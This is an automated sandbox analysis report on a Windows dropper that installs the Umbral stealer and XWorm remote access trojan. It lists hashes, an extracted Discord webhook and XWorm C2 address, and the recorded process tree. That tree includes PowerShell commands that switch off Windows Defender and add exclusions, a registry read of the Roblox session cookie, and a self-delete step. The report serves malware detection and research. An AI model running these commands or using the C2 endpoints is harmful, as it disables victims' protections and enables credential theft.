Analysis

  • max time kernel
    125s
  • max time network
    135s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    15-11-2024 02:03

General

  • Target

    073997d20ef564e271ffb2b4d86773dbf7eddfb7e9f4811b0deb798b4505e2ce.exe

  • Size

    800KB

  • MD5

    7198fa10a50ea9aaf6ae5c2a05af2104

  • SHA1

    c35a2a73313e3c5ad08136e3bc583bb9bc26964c

  • SHA256

    073997d20ef564e271ffb2b4d86773dbf7eddfb7e9f4811b0deb798b4505e2ce

  • SHA512

    56db894671d6b5e093ef2de88ba785f1d9159e2b206593886ad540d336c5dfa79cd5ea7b6b29fbdd39d3a2355bcc01d90f5fff64e97fcbda383e38df79353acf

  • SSDEEP

    12288:naMgC/rJdxLDMVVV/1EIEm6l6O6+26AFxKxg0YZbs7Ql:naMgGfxLDmVwoV+26YcY+0

Malware Config

Extracted

Family

umbral

C2

https://discord.com/api/webhooks/1303474825066446879/NebQ1EAeNBTUfzGkn_W4tnvKCl9pOSQ87UqZdaxri0p165SfLuSuU_8R57ng1lqsCx6o

Extracted

Family

xworm

C2

127.0.0.1:26848

23.ip.gl.ply.gg:26848

Attributes
  • Install_directory

    %Userprofile%

  • install_file

    Windows Security Host.exe

Signatures

  • Detect Umbral payload 2 IoCs
  • Detect Xworm Payload 2 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Umbral family
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 1 IoCs
  • Drops startup file 2 IoCs
  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 7 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\073997d20ef564e271ffb2b4d86773dbf7eddfb7e9f4811b0deb798b4505e2ce.exe
    "C:\Users\Admin\AppData\Local\Temp\073997d20ef564e271ffb2b4d86773dbf7eddfb7e9f4811b0deb798b4505e2ce.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2528
    • C:\Users\Admin\AppData\Local\Temp\Injector.exe
      "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
      2⤵
      • Drops file in Drivers directory
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1592
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2444
      • C:\Windows\system32\attrib.exe
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        3⤵
        • Views/modifies file attributes
        PID:1444
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Injector.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:536
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2192
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1100
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:1152
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" os get Caption
        3⤵
          PID:984
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" computersystem get totalphysicalmemory
          3⤵
            PID:3008
          • C:\Windows\System32\Wbem\wmic.exe
            "wmic.exe" csproduct get uuid
            3⤵
              PID:2536
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              3⤵
              • Command and Scripting Interpreter: PowerShell
              PID:2408
            • C:\Windows\System32\Wbem\wmic.exe
              "wmic" path win32_VideoController get name
              3⤵
              • Detects videocard installed
              PID:2944
            • C:\Windows\system32\cmd.exe
              "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Injector.exe" && pause
              3⤵
              • System Network Configuration Discovery: Internet Connection Discovery
              PID:1184
              • C:\Windows\system32\PING.EXE
                ping localhost
                4⤵
                • System Network Configuration Discovery: Internet Connection Discovery
                • Runs ping.exe
                PID:2816
          • C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
            "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
            2⤵
            • Drops startup file
            • Executes dropped EXE
            • Adds Run key to start application
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:2948
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe'
              3⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2652
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Security Host.exe'
              3⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2924
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Windows Security Host.exe'
              3⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:296
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Security Host.exe'
              3⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1844
          • C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
            "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
            2⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:2164
            • C:\Windows\system32\cmd.exe
              "cmd" /c ipconfig /all
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:2764
              • C:\Windows\system32\ipconfig.exe
                ipconfig /all
                4⤵
                • Gathers network information
                PID:2852
            • C:\Windows\system32\cmd.exe
              "cmd" /c wmic nicconfig where (IPEnabled=TRUE) call SetDNSServerSearchOrder ("1.1.1.1", "1.0.0.1")
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1852
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic nicconfig where (IPEnabled=TRUE) call SetDNSServerSearchOrder ("1.1.1.1", "1.0.0.1")
                4⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:2036
            • C:\Windows\system32\WerFault.exe
              C:\Windows\system32\WerFault.exe -u -p 2164 -s 1120
              3⤵
              • Loads dropped DLL
              PID:2888

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe

          Filesize

          800KB

          MD5

          02c70d9d6696950c198db93b7f6a835e

          SHA1

          30231a467a49cc37768eea0f55f4bea1cbfb48e2

          SHA256

          8f2e28588f2303bd8d7a9b0c3ff6a9cb16fa93f8ddc9c5e0666a8c12d6880ee3

          SHA512

          431d9b9918553bff4f4a5bc2a5e7b7015f8ad0e2d390bb4d5264d08983372424156524ef5587b24b67d1226856fc630aaca08edc8113097e0094501b4f08efeb

        • C:\Users\Admin\AppData\Local\Temp\Injector.exe

          Filesize

          229KB

          MD5

          3882cfe50e35985982e9ef0c01b99c47

          SHA1

          6e09c71ae230b839163628c9179b3a3aac58c1a3

          SHA256

          da73db144e8035dd81ab4578b7f856131351ec33119c9ce0c46d852499621636

          SHA512

          a539767dc599b8a6103c413b4a42c83c7ce09d3171c45890f2630ad000166854c5ac220f78ab966ea90c55c1d6361ce70ea5ab3671fc2913445e8009126a534e

        • C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe

          Filesize

          79KB

          MD5

          c7ba63ce2ed6d0aab93ad839e0eddd68

          SHA1

          087ffd969b37a73b349a81af18bb51191eb42cbd

          SHA256

          84be55fb4b514ebdb999b5caf4e0837c521b5e7a4f85f636e4593daf09eedae9

          SHA512

          9f63cfdb94af23cebc85ffd491364c1a90ab90736fc8da0fe16ebf2fb18e9a6eb8fea4dfca87d8353565ba684b0c8f461371588aac72101b355886619bf672f6

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

          Filesize

          7KB

          MD5

          a59c3be720b49071f7c424549be1cc88

          SHA1

          0e63dcde41dcf2137fcf3ca865bc42aa2e42c8df

          SHA256

          7c42c4c95d48c2795520203b1ba21cabb7f7c8d959888c32e0d750f0d1643614

          SHA512

          25604991b3326220cf10920769decd3688802d5601daa222ecc76a59b0be0380229d082a75c5d132e1c2fa74fe072c5cb56e1785edc7f38ef2b6f1e3e66c1cfb

        • memory/1592-21-0x000007FEF6640000-0x000007FEF702C000-memory.dmp

          Filesize

          9.9MB

        • memory/1592-90-0x000007FEF6640000-0x000007FEF702C000-memory.dmp

          Filesize

          9.9MB

        • memory/1592-11-0x0000000000C80000-0x0000000000CC0000-memory.dmp

          Filesize

          256KB

        • memory/2164-24-0x0000000001350000-0x000000000141E000-memory.dmp

          Filesize

          824KB

        • memory/2192-54-0x0000000001E70000-0x0000000001E78000-memory.dmp

          Filesize

          32KB

        • memory/2528-0-0x000007FEF6643000-0x000007FEF6644000-memory.dmp

          Filesize

          4KB

        • memory/2528-20-0x000007FEF6640000-0x000007FEF702C000-memory.dmp

          Filesize

          9.9MB

        • memory/2528-1-0x00000000011B0000-0x0000000001222000-memory.dmp

          Filesize

          456KB

        • memory/2528-3-0x000007FEF6640000-0x000007FEF702C000-memory.dmp

          Filesize

          9.9MB

        • memory/2652-31-0x0000000002240000-0x0000000002248000-memory.dmp

          Filesize

          32KB

        • memory/2652-30-0x000000001B6B0000-0x000000001B992000-memory.dmp

          Filesize

          2.9MB

        • memory/2924-38-0x0000000002350000-0x0000000002358000-memory.dmp

          Filesize

          32KB

        • memory/2924-37-0x000000001B640000-0x000000001B922000-memory.dmp

          Filesize

          2.9MB

        • memory/2948-16-0x0000000000BE0000-0x0000000000BFA000-memory.dmp

          Filesize

          104KB